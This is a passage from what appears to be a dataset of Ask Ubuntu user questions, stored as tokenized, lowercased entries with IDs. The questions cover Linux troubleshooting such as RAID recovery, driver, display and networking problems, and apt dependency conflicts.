nothing seems to make any difference . sometimes i will get the screens to be stable for a few hours , but then when i turn off my computer the fix goes away . the only thing i have learned for certain is that bumblebee seems to completely disable my display , and i have to go into safemode to remove it before anything will work . it is not feasible for me to fix this once and then never turn off my computer again . another , possibly unconnected , issue is that my second monitor is coming up as maxium 1920x1080 , when it is actually 2560x1440 . my laptop itself is only 1368x768 so i really need the extra screen space . i would be satisfied if i can just get the second monitor to work , then i will just use that screen and keep my laptop disabled . thus far i have been unable to do that . any suggestions ?
435223	cryptoslax with qualcomm atheros killer e2200	as many people , i am a newbie on linux but found cryptoslax an amazing tool for cryptomining . i am currently trying to make my ethernet cards from my mobo msi z87g45 gaming to work on cryptoslax , but because i am very , very stupid on linux , i would like to perhaps have a little help from one of the enlightening linux guys to get me to make this card to work . the card is a qualcomm atheros bigfoot killer e2200 . so , what to do ? many thanks soderi
435224	mdadm array disappeared	i was moving my mdadm array from my old machine to a new one . as the new one was not able to see it , i tried to put it back , but i seem to have lost all superblocks . only 1 drive has a partition . help ! ( i have backups of the most important stuff ... but i 'd rather not try to see if the backups worked ) the details : running ubuntu 13.10 server array comprises 4 hdd of 3tb each , in raid10 . this is my data drive , not the boot all 4 disks are detected , but only 1 has a valid partition , and even that has no md superblock detected these are my notes from when i originally created the array : ( creating the 4 disk partitions ) sudo gdisk /dev/xxx > p - > make sure ok > n > ( enter a few times ) > fd00 > w ( creating the array ) sudo mdadm -- create /dev/md1 -- metadata=1.2 -- verbose -- level=10 -- raid-devices=4 /dev/sdc1 /dev/sdg1 /dev/sde1 /dev/sdh1 –layout=f2 -- chunk=1024 –name=share1 ( creating the fs ) mkfs.ext4 -v -b 4096 -e stride=256 , stripe-width=512 /dev/md1 ( mdadm.conf ) array /dev/md1 level=raid10 num-devices=4 metadata=1.2 name=server02 : share1 uuid=89c4b606:01327383 : c367db0f:8e93606f questions at this stage i think my first issue is getting back the 3 missing partitions , right ? is there a way to copy the partition info from /dev/sda1 ( which appears correct ) onto the other 3 drives ? assuming i can get those partitions back ... then next step is to re-run the same mdadm -- create i had done before , right ? more info cat /proc/partitions shows all 4 drives ( sda-c-d-e ) cat /proc/partitions major minor # blocks name 11 0 1048575 sr0 8 0 2930266584 sda 8 1 2930265543 sda1 8 16 78150744 sdb 8 17 102400 sdb1 8 18 69854208 sdb2 8 19 1 sdb3 8 21 2532352 sdb5 8 22 308224 sdb6 8 23 5349376 sdb7 8 32 2930266584 sdc 8 48 2930266584 sdd 8 64 2930266584 sde 8 80 244198584 sdf 8 81 97659103 sdf1 8 82 1 sdf2 8 83 51199155 sdf3 8 85 9936171 sdf5 dmesg does not show anything odd : dmesg | grep sdd [ 1.400539 ] sd 2:0:0:0 : [ sdd ] 5860533168 512-byte logical blocks : ( 3.00 tb/2 . 72 tib ) [ 1.400544 ] sd 2:0:0:0 : [ sdd ] 4096-byte physical blocks [ 1.400573 ] sd 2:0:0:0 : [ sdd ] write protect is off [ 1.400577 ] sd 2:0:0:0 : [ sdd ] mode sense : 00 3a 00 00 [ 1.400590 ] sd 2:0:0:0 : [ sdd ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 1.463874 ] sdd : [ 1.463970 ] sd 2:0:0:0 : [ sdd ] attached scsi disk blkid does not show any member sudo blkid /dev/sdb1 : label= '' system reserved '' uuid= '' d8822f92822f7462 '' type= '' ntfs '' /dev/sdb2 : uuid= '' 623c39873c3956ef '' type= '' ntfs '' /dev/sdb5 : uuid= '' 7faf4a24-3091-40bb-9c89-0b323d1f8202 '' type= '' ext4 '' /dev/sdb6 : uuid= '' 59300063-93fd-4ffb-9956-51c2f7acc106 '' type= '' swap '' /dev/sdb7 : uuid= '' 2ddd72e7-e761-4404-8843-b3d9262e99ff '' type= '' ext4 '' /dev/sdf1 : uuid= '' 3bec1677-d3ae-4045-b60b-8aa7e72b3b26 '' sec_type= '' ext2 '' type= '' ext 3 '' /dev/sdf3 : uuid= '' 06701150701147b7 '' type= '' ntfs '' /dev/sdf5 : uuid= '' ed3ff2ab-29c9-471c-b67c-f6bcd75a9768 '' type= '' swap '' parted shows something for sda , but no the others sudo parted -l model : ata wdc wd30efrx-68a ( scsi ) disk /dev/sda : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 3001gb 3001gb linux raid raid model : ata wdc wd30efrx-68a ( scsi ) disk /dev/sdc : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags model : ata wdc wd30efrx-68a ( scsi ) disk /dev/sdd : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags model : ata wdc wd30efrx-68a ( scsi ) disk /dev/sde : 3001gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags no supoerblocks sudo mdadm -- examine /dev/sd [ acde ] /dev/sda : mbr magic : aa55 partition [ 0 ] : 4294967295 sectors at 1 ( type ee ) /dev/sdc : mbr magic : aa55 partition [ 0 ] : 4294967295 sectors at 1 ( type ee ) /dev/sdd : mbr magic : aa55 partition [ 0 ] : 4294967295 sectors at 1 ( type ee ) /dev/sde : mbr magic : aa55 partition [ 0 ] : 4294967295 sectors at 1 ( type ee ) sudo mdadm -- examine /dev/sd [ acde ] 1 mdadm : no md superblock detected on /dev/sda1 . little more , probably un-necessary background the original server died a couple of weeks ago , and what i call the `` old '' server above is a temporary dual boot of my htpc . so a fresh 13.10 install . this was working fine not sure about the issues with the new server where i was moving the array ... maybe related to the marvell se9172 chipset , which apparently causes issues in linux , or to the old ssd where i had put the o/s at the first boot attempts on the new server , mdadm complained about the degraded array ( since 2 drives were on the marvell sata ) . once i shuffled the connections lvm would complain about the root volume missing . so i put all disks back in the original machine ( the dual boot htpc ) and discovered all was missing ...
435225	sharing a connection with a server using a unique ip	i have followed luis alvarado 's post on sharing connection to other pcs ( via wired ethernet ) up until the `` client pc '' part and am now sharing my laptop 's internet connection with my desktop server with an ethernet cable . however , only my laptop can see the server ( at 10.42.0.50 ) , no other machines on the network have access to it . how can i make my server visible to the entire network ? ifconfig for client laptop : eth0 link encap : ethernet hwaddr 88:51 : fb : fc:53:83 inet addr:10.42.0.1 bcast:10.42.0.255 mask:255.255.255.0 inet6 addr : fe80 : :8a51 : fbff : fefc:5383/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:45824 errors:0 dropped:0 overruns:0 frame:0 tx packets:79374 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3211077 ( 3.2 mb ) tx bytes:119560393 ( 119.5 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:48417 errors:0 dropped:0 overruns:0 frame:0 tx packets:48417 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:20154679 ( 20.1 mb ) tx bytes:20154679 ( 20.1 mb ) virbr0 link encap : ethernet hwaddr 26:61:43 : c4:5a : eb inet addr:192.168.122.1 bcast:192.168.122.255 mask:255.255.255.0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 60:36 : dd:05:21 : de inet addr:192.168.1.4 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :6236 : ddff : fe05:21de/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1221932 errors:0 dropped:0 overruns:0 frame:0 tx packets:1361697 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:480592551 ( 480.5 mb ) tx bytes:1308414648 ( 1.3 gb ) ifconfig for server : eth0 link encap : ethernet hwaddr 00:16:76:90 : b6:87 inet addr:10.42.0.50 bcast:10.42.0.255 mask:255.255.255.0 inet6 addr : fe80 : :216:76ff : fe90 : b687/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:23833 errors:0 dropped:0 overruns:0 frame:0 tx packets:13747 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:35930553 ( 35.9 mb ) tx bytes:971695 ( 971.6 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b )
435226	wi-fi issue : ralink mt7601 does not have proper driver to it	this chip is not even recognized as a wi-fi adapter , no kernel module to it , lsusb returns `` ralink technology '' with no chip model after it but packaging says mt7601 .
435227	how come the contents of text elements are n't being properly justified ?	consider the following page in a qml application : page { text { anchors.fill : parent anchors.margins : units.gu ( 2 ) horizontalalignment : text.alignjustify text : `` aaaaaa aaaaaa aaaaaa aaaaaa aaaaaa aaaaaa aaa aaa aaa aaa aaa aaa aaa aaa . '' wrapmode : text.wordwrap } } i expect that the contents of the text element would be justified but this is clearly not the case : as you can see , the first line is not justified as it should be . what am i doing wrong ?
435231	how can i get my pci-audio card ( vt1723 + vt1617a ) to work ?	i have one pci audio card with vt1723 + vt1617 codec . it works normally in windows , but has no sound in ubuntu 12.04 . i have enabled ice1724 module in alsa-base.conf . some detail of the interface with this pci audio card : one 3.5mm line output interface ( stereo ) one 3.5mm line / microphone input interface one auxiliary analog audio input connector 4pin one side port optical digital output interface one rca coaxial digital output interface one front audio interfaces one 10pin digital expansion interface ! linux distribution ! ! -- -- -- -- -- -- -- -- -- ubuntu 12.04.4 lts \n \l distrib_id=ubuntu distrib_description= '' ubuntu 12.04.4 lts '' name= '' ubuntu '' id=ubuntu id_like=debian pretty_name= '' ubuntu precise ( 12.04.4 lts ) '' ! ! dmi information ! ! -- -- -- -- -- -- -- - manufacturer : gigabyte technology co. , ltd . product name : to be filled by o.e.m . product version : to be filled by o.e.m . firmware version : f4b ! ! kernel information ! ! -- -- -- -- -- -- -- -- -- kernel release : 3.8.0-35-generic operating system : gnu/linux architecture : x86_64 processor : x86_64 smp enabled : yes ! ! alsa version ! ! -- -- -- -- -- -- driver version : k3.8.0-35-generic library version : 1.0.25 utilities version : 1.0.25 ! ! loaded alsa modules ! ! -- -- -- -- -- -- -- -- -- - snd_hda_intel snd_ice1724 snd_hda_intel snd_usb_audio ! ! soundcards recognised by alsa 0 [ hdmi ] : hda-intel - hda ati hdmi hda ati hdmi at 0xfef44000 irq 54 1 [ sq210a ] : ice1724 - ooaoo sq210a ooaoo sq210a at 0xd080 , irq 20 2 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xfef40000 irq 16 3 [ u0x46d0x802 ] : usb-audio - usb device 0x46d:0x802 usb device 0x46d:0x802 at usb-0000:00:12.2-3.4 , high speed ( card 0 : amd apu integraded audio chip , work normally card 1 : pci audio card ( vt1723 + vt1617a ) with no sound card 2 : onboard audio card ( reltek chip ) , work normally card 3 : usb camera , work normally ) ! ! pci soundcards installed in the system ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00:01.1 audio device : advanced micro devices , inc. [ amd/ati ] trinity hdmi audio controller 00:14.2 audio device : advanced micro devices , inc. [ amd ] fch azalia controller ( rev 01 ) 02:06.0 multimedia audio controller : via technologies inc. vt1720/24 [ envy24pt/ht ] pci multi-channel audio controller ( rev 01 ) ! ! modprobe options ( sound related ) ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- snd-atiixp-modem : index=-2 snd-intel8x0m : index=-2 snd-via82xx-modem : index=-2 snd-usb-audio : index=-2 snd-usb-caiaq : index=-2 snd-usb-ua101 : index=-2 snd-usb-us122l : index=-2 snd-usb-usx2y : index=-2 snd-cmipci : mpu_port=0x330 fm_port=0x388 snd-pcsp : index=-2 snd-usb-audio : index=-2 snd-ice1724 : model=auto the detail of alsa information script v 0.4.63 . { google drive } { dropbox } any idea ?
435232	install older version of software and dependencies	i need to install r 3.0.2 because a needed library is n't compatible with 3.0.3 yet ( the latest ) . i can install the older version of r like so : sudo apt-get install r-base=3.0.2-1precise0 however all the dependencies of r-base try and install with 3.0.3 root @ foo : ~ # apt-get install r-base=3.0.2-1precise0 reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : r-base : depends : r-recommended ( = 3.0.2-1precise0 ) but 3.0.3-1precise0 is to be installed e : unable to correct problems , you have held broken packages . how can i install r-base 3.0.2 and all the dependencies as 3.0.2 ?
435234	bluetooth pan does n't work with ubuntu 13.10	i have a 13.10 x64 ubuntu with a sony android phone which has no problem in sending files between them but not tethering through the bluetooth , i have tried both gnome-bluetooth and the blueman gnome-bluetooth : disconnect the bluetooth immediately after paired and which toggled to connect when transferring files , but the connectivity is not toggled when pan option is ticked blueman : the service is successfully found and joined but there is no connectivity and when i try to disconnect then connect again , it said failed to connect the ifconfig shows the following bnep0 link encap : ethernet hwaddr < < hidden > > inet6 addr : fe80 : :21b : b1ff : fe6c : e554/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4 errors:0 dropped:0 overruns:0 frame:0 tx packets:5 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:196 ( 196.0 b ) tx bytes:212 ( 212.0 b ) i wonder what can i do in order to get bluetooth tethering work ( neither work in blueman or gnome-bluetooth )
435236	lenovo battery threshold on z570 still not working ; even with tlp	i tried following the tlp stuff in this manual , but still when i watch the battery status , it still gets charged even after the stop threshold is set at 60 % and the battery is at 99 % does it even work for ideapads ?
435239	oracle java virtual machine install ?	i cant get it install and i need it running for a job application i need to put in online . jre-7u51-linux-i586.tar.gz that 's the file and every time i try to install it wont complete , says can not find file .
435244	how to get windows data back	i reinstalled ubuntu few months ago . by accident i chose to install ubuntu without windows ( i had dual boot operating systems before that ) . this is a disaster ! i lost all my data in windows and lost the operating system as well . do you know if i can recover my operating system ? bring windows back to the laptop , or at least recover those data files in windows ?
435251	black and white checkerboard in xrdp	i 've recently been trying to install and connect to xrdp in ubuntu 13.10 , and authentication seems to be going properly , but when the screen transitions to the os , the only thing i can see is a checkerboard . there 's no menus or other indicators that ubuntu even boots ( though i know it does , i can ssh to it ) . when i run xrdp -nodaemon i get these errors : xrdp_mm_process_login_response : connect failed trying again ... xrdp_mm_process_login_response : connect failed trying again ... xrdp_mm_process_login_response : connect failed trying again ... xrdp_mm_process_login_response : connect failed trying again ... xrdp_mm_process_login_response : error in trans_connect chan it may also be useful to know that i 'm not currently using a monitor in this system .
435252	raid6 ubuntu rebuild - how to calculate best parameters for fastest rebuild	i am doing a resync on a raid6 array and i am looking at some 2 days to complete . i looked here for hints on how to speed it up , but i have , instead , managed to slow it down ! hw details are : 10x 4tb wd black hdds ( one died so resync is due to this ) core2quad , asus p5k deluxe with 8gb ram what are the best params ( value ) to use for this config and/or how do i calculate these ? hint 1 - min / max speed limits : echo value > /proc/sys/dev/raid/speed_limit_min ( i set to 90000 ) echo value > /proc/sys/dev/raid/speed_limit_max ( i set to 900000 ) hint 2 - read ahead : blockdev -- setra value /dev/md0 ( set to 32mb / 65536 ) hint 3 : stripe-cache size ( how do i find system_page_size ? i set to 32mb / 32768 and have not seen out of memory error ) : memory_consumed = system_page_size * nr_disks * stripe_cache_size echo value > /sys/block/md0/md/stripe_cache_size i have disabled ncq and enabled internal bitmap before starting resync so these steps are working . thanks !
435253	does n't ubuntu 13.10 support the hostapd nl80211 driver ?	i could use hostapd-2.1 to set wireless ap in ubuntu 12.04 . but in ubuntu 13.10 it failed . the same source code for hostapd-2.1 was failing in 13.10 . the error message : nl80211 : failed to set wlan0 as ap nl80211 : driver initialization failed what should i do to modify hostapd-2.1 to work on ubuntu 13.10 ?
435255	is any antivirus required in ubuntu to use credit cards online -- suggestion needed	hope you are doing well . i know this topic has been answered in details in one thread - do i need to have 'antivirus software ' installed ? but i am still little confused , the only thing that i use windows 7 for now is for paying bills with credit cards . my credit card was once hacked , so i guess i am a little paranoid . i would really appreciate , if someone tell me if i need to install anti viruse in ubuntu , and if yes , what i should go for ? any help will be earnestly appreciated . regards
435257	changing sdb5 to sda6 after dd to new partition	i made up a fresh ubuntu 12.04 lts on an external hd . /grub / /swap i do this so that i do n't have to waste time looking for drivers , config etc , and i can just dd is to my mac book pro in partitions i prepare for this so if anything goes wrong i can dd a new os no fuss . i did this but when i went to start , using refit then grub it comes up that sda6 can not be written or read from . so i booted up useing recovery on ubuntu and comand shell , the cd to grub.cfg , and nano grub.cfg but i do n't know what to change in here , infact i am not sure grub.cfg is the place to be , somewhere i need to change something to make the ubuntu / dd , think it is sda6 on sdb5 . i used the external hd to boot up back into linux , and it wont let me mount the internal version because the internal version conflicts as it already has sdb5 mounted , so no way in . i do n't know what i have to change and where ... .
435260	why ca n't i watch movies ?	i installed vlc player and it still wo n't play dvds . i 'm running 13.10 . it acts like its about to play and then it just stops .
435261	what are the possible threats if internal ip address is publicly revealed ?	in many cases , people do not take enough care to remove their ip addresses from some output before posting it to help forums and q & a sites like askubuntu . considering one 's ip address is revealed publicly , what are the possible threats he/she/bot may face and what can one do to avoid them ? also , is there any threat in revealing other data like broadcast address , subnet mask , default route , primary dns and secondary dns ? of course we will consider that the person/bot is using a supported version of ubuntu or it 's official derivatives .
435262	prevent resume from suspend on lid open for 14.04	i 'm running ubuntu 14.04 on an asus n550jv . i had this problem in 13.10 also . i want to disable resume-from-suspend when the laptop lid is opened . the traditional answers to this involve echo `` lid '' > /proc/acpi/wakeup , but there is no entry for lid in this file : $ cat /proc/acpi/wakeup device s-state status sysfs node rp01 s4 *disabled pci:0000:00:1c.0 pxsx s4 *disabled pxsx s4 *disabled rp03 s4 *disabled pci:0000:00:1c.2 pxsx s4 *disabled pci:0000:04:00.0 wlan s3 *disabled rp04 s4 *disabled pci:0000:00:1c.3 pxsx s4 *disabled pci:0000:05:00.0 glan s4 *disabled ehc1 s3 *enabled pci:0000:00:1d.0 ehc2 s3 *enabled pci:0000:00:1a.0 xhc s3 *enabled pci:0000:00:14.0 hdef s4 *disabled pci:0000:00:1b.0 peg0 s4 *disabled pci:0000:00:01.0 pegp s4 *disabled pci:0000:01:00.0 pega s4 *disabled peg1 s4 *disabled peg2 s4 *disabled slpb s4 *enabled acpi_listen is n't very helpful either : $ acpi_listen button/lid lid 00000080 000000f5 video gfx0 00000080 00000000 button/lid lid 00000080 000000f6 video gfx0 00000080 00000000 i found some additional info , but sadly this does not help : toggle /sys/devices/platform/asus-nb-wmi/lid_resume using # echo 0 > /sys/devices/platform/asus-nb-wmi/lid_resume refs : https : //github.com/torvalds/linux/commit/c0b91b6d5226247fa4fe894eb592bcc56bc7e9fd https : //wiki.ubuntu.com/kernel/reference/s3
435264	missing libmmblib.so	i am facing this kind of problem where my library which is libmmb.lib.so was missing . does anyone know how to trace it ? the commands as shown below . birg @ birg-pc1 : /home/soft/mmb_2.14_linux32 $ ./mmb.2_14.linux32 -c commands.hairpin-short.dat ./mmb.2_14.linux32 : error while loading shared libraries : libmmblib.so : can not open shared object file : no such file or directory birg @ birg-pc1 : /home/soft/mmb_2.14_linux32 $ sudo apt-get install libmmblib.so [ sudo ] password for birg : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libmmblib.so e : could n't find any package by regex 'libmmblib.so'
435266	acpi_listen does n't detect events	i can run acpi_listen , then press all of the function keys ( eg fn+f5 to dim the screen backlight ) , but no events are reported in acpi_listen . how can i get acpi_listen to report the acpi events that acpid sees ? i 'm using ubuntu 13.10 on an asus n550jv laptop .
435268	server unexpectedly closed	so i know that similar veins to this topic have been posted , but mine specifically deals with the fact that my ssh login through putty worked from my desktop and my laptop . however , after carrying out some steps to secure it , my laptop can still gain access through ssh but my desktop kicks me out and says : server unexpectedly closed network connection the fact that i can still connect from one and not the other means that the port is fine , but what firewall feature is causing this issue ? i am using 12.04 . i have uninstalled fail2ban and denyhosts as a test , and this did n't fix the problem . the port is open , i have checked .
435269	installing ubuntu while dealing with partitions ( windows xp )	i want to switch over to ubuntu from xp . i looked at my c : drive and noticed the it is divided into 3 sections . my antiquated floppy drive , ( at least i think that is correct ) c drive , a an unknown partition of 3gb . my question is , do i need to remove the partition to free up the 3gb ? ( which is fat32 ) . i am not a techie , though i wish i was . are there any simple instructions to deal with this ? will ubuntu just write over the unknown partition , or is that wishful thinking ? i was considering installing ubuntu beside xp , but that might be problematic .
435270	ubuntu is not accepting my passwords	i just installed 13.10 on my laptop and the passwords for login will not work . i 'm very sure that i am not typing it wrong , and it will not accept my remote login either . i have restarted the pc and it skips the grub menu . how do i fix this without re-installing ?
435272	how to mine w/ 5+ graphics cards on gigabyte 990fxa ud5 ( ubuntu 13.10 )	what is the specific process by which to properly set up 5 or more graphics cards for litecoin mining on the gigabyte 990fxa ud5 or other motherboards running ubuntu 13.10 ?
435273	how to change plymouth in ubuntu 13.10	i installed ubuntu 13.10 and i want to change the plymouth . i tried using these commands but it did not work sudo add-apt-repository ppa : mefrio-g/plymouthmanager sudo apt-get update sudo apt-get install plymouth-manager please help me to solve this problem i want to add my own custom boot screen .
435274	evaluating a string in shell script	i am following this bash shell scripting guide : http : //www.tldp.org/ldp/bash-beginners-guide/html/sect_07_01.html in the section numeric comparisons , it cites an example : anny > num=`wc -l work.txt` anny > echo $ num 201 anny > if [ `` $ num '' -gt `` 150 '' ] more input > then echo ; echo `` you 've worked hard enough for today . '' more input > echo ; fi what seems to happen above is we store a string of commands in a bash variable and then we invoke echo on the variable . what seems to happen is the string is evaluated and the wc command is executed and returns the line count to the controlling terminal . ok , so i launch my terminal in ubuntu 12.04 and try something similar : $ touch sample.txt & & echo `` hello world '' > sample.txt $ cat sample.txt hello world $ num='wc -l sample.txt' echo $ num wc -l sample.txt wait a second , that did n't evaluate the string and return the line count . that just echoed the string back to the terminal . why did i get different results ?
435275	garbage in primus with nvidia bumblebee on trusty	the following appears when running optirun glxgears with primus and nvidia-331-updates configured in bumblebee.conf : this is on 14.04 trusty tahr , upgraded from 13.10 . the application seems to run on the nvidia gpu , but does n't display correctly as it did in the previous distro version . i suspect this is a bug in primus in the 14.04 repos , unless one of my packages is poorly configured . the window does refresh and display part of the glxgears image , but only when i shrink the window , and once per frame that the window is being resized . the gl viewport is scaled incorrectly in this process as well . continuing some testing , the primus_upload=1 flag seems to make the window refresh properly and everything works as intended . this is not a permanent solution though .
435279	unmet dependency issue installing libmapnik	i 'm trying to install cartodb , and have run into the dreaded `` you may have requested an impossible situation '' message : $ sudo apt-get install -y libmapnik-dev python-mapnik mapnik-utils reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libmapnik-dev : depends : libmapnik ( = 2.2.0+dev20131008.git.fe06c95-1~lucid1 ) but it is not going to be installed depends : libboost-thread-dev ( > = 1.42 ) but it is not going to be installed depends : libboost-filesystem-dev ( > = 1.42 ) but it is not going to be installed depends : libboost-regex-dev ( > = 1.42 ) but it is not going to be installed depends : libboost-python-dev ( > = 1.42 ) but it is not going to be installed depends : libboost-system-dev ( > = 1.42 ) but it is not going to be installed depends : libboost-program-options-dev ( > = 1.42 ) but it is not going to be installed mapnik-utils : depends : libboost-program-options1.49.0 ( > = 1.49.0-1 ) but it is not installable depends : libboost-system1.49.0 ( > = 1.49.0-1 ) but it is not installable depends : libmapnik ( = 2.2.0+dev20131008.git.fe06c95-1~lucid1 ) but it is not going to be installed python-mapnik : depends : libboost-python1.49.0 ( > = 1.49.0-1 ) but it is not installable depends : libboost-thread1.49.0 ( > = 1.49.0-1 ) but it is not installable depends : libmapnik ( = 2.2.0+dev20131008.git.fe06c95-1~lucid1 ) but it is not going to be installed e : broken packages i 've tried [ 1 ] most of the suggestions in the how do i resolve unmet dependencies question , but no dice . there are a few things that make this situation particularly hard to diagnose and fix ( for me ) : it 's lucid ( and it has to be , for cartodb to work ) i 'm just following instructions ( a pretty long list of them ) the instructions did n't quite work , so i 've had to vary a couple of things , such as installing python 2.7.3 ( using altinstall , so it does n't overwrite 2.6.x ) there are lots of custom ppa 's . the commands i ran are documented in this gist : https : //gist.github.com/stevage/9593847 and the full ( huge ) log is here : https : //gist.github.com/stevage/9593835 as requested : $ cat /etc/apt/sources.list # # note , this file is written by cloud-init on first boot of an instance # # modifications made here will not survive a re-bundle . # # if you wish to make changes you can : # # a . ) add 'apt_preserve_sources_list : true ' to /etc/cloud/cloud.cfg # # or do the same in user-data # # b . ) add sources in /etc/apt/sources.list.d # # c. ) make changes to template file /etc/cloud/templates/sources.list.tmpl # # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu/ lucid main deb-src http : //archive.ubuntu.com/ubuntu/ lucid main # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu/ lucid-updates main deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates main # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu/ lucid universe deb-src http : //archive.ubuntu.com/ubuntu/ lucid universe deb http : //archive.ubuntu.com/ubuntu/ lucid-updates universe deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # deb http : //archive.ubuntu.com/ubuntu/ lucid multiverse # deb-src http : //archive.ubuntu.com/ubuntu/ lucid multiverse # deb http : //archive.ubuntu.com/ubuntu/ lucid-updates multiverse # deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # deb-src http : //archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu lucid partner # deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //security.ubuntu.com/ubuntu lucid-security main deb-src http : //security.ubuntu.com/ubuntu lucid-security main deb http : //security.ubuntu.com/ubuntu lucid-security universe deb-src http : //security.ubuntu.com/ubuntu lucid-security universe # deb http : //security.ubuntu.com/ubuntu lucid-security multiverse # deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse deb http : //ppa.launchpad.net/fkrull/deadsnakes/ubuntu lucid main deb-src http : //ppa.launchpad.net/fkrull/deadsnakes/ubuntu lucid main and $ cat /etc/apt/sources.list # # note , this file is written by cloud-init on first boot of an instance # # modifications made here will not survive a re-bundle . # # if you wish to make changes you can : # # a . ) add 'apt_preserve_sources_list : true ' to /etc/cloud/cloud.cfg # # or do the same in user-data # # b . ) add sources in /etc/apt/sources.list.d # # c. ) make changes to template file /etc/cloud/templates/sources.list.tmpl # # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu/ lucid main deb-src http : //archive.ubuntu.com/ubuntu/ lucid main # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu/ lucid-updates main deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates main # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu/ lucid universe deb-src http : //archive.ubuntu.com/ubuntu/ lucid universe deb http : //archive.ubuntu.com/ubuntu/ lucid-updates universe deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # deb http : //archive.ubuntu.com/ubuntu/ lucid multiverse # deb-src http : //archive.ubuntu.com/ubuntu/ lucid multiverse # deb http : //archive.ubuntu.com/ubuntu/ lucid-updates multiverse # deb-src http : //archive.ubuntu.com/ubuntu/ lucid-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # deb-src http : //archive.ubuntu.com/ubuntu/ lucid-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu lucid partner # deb-src http : //archive.canonical.com/ubuntu lucid partner deb http : //security.ubuntu.com/ubuntu lucid-security main deb-src http : //security.ubuntu.com/ubuntu lucid-security main deb http : //security.ubuntu.com/ubuntu lucid-security universe deb-src http : //security.ubuntu.com/ubuntu lucid-security universe # deb http : //security.ubuntu.com/ubuntu lucid-security multiverse # deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse deb http : 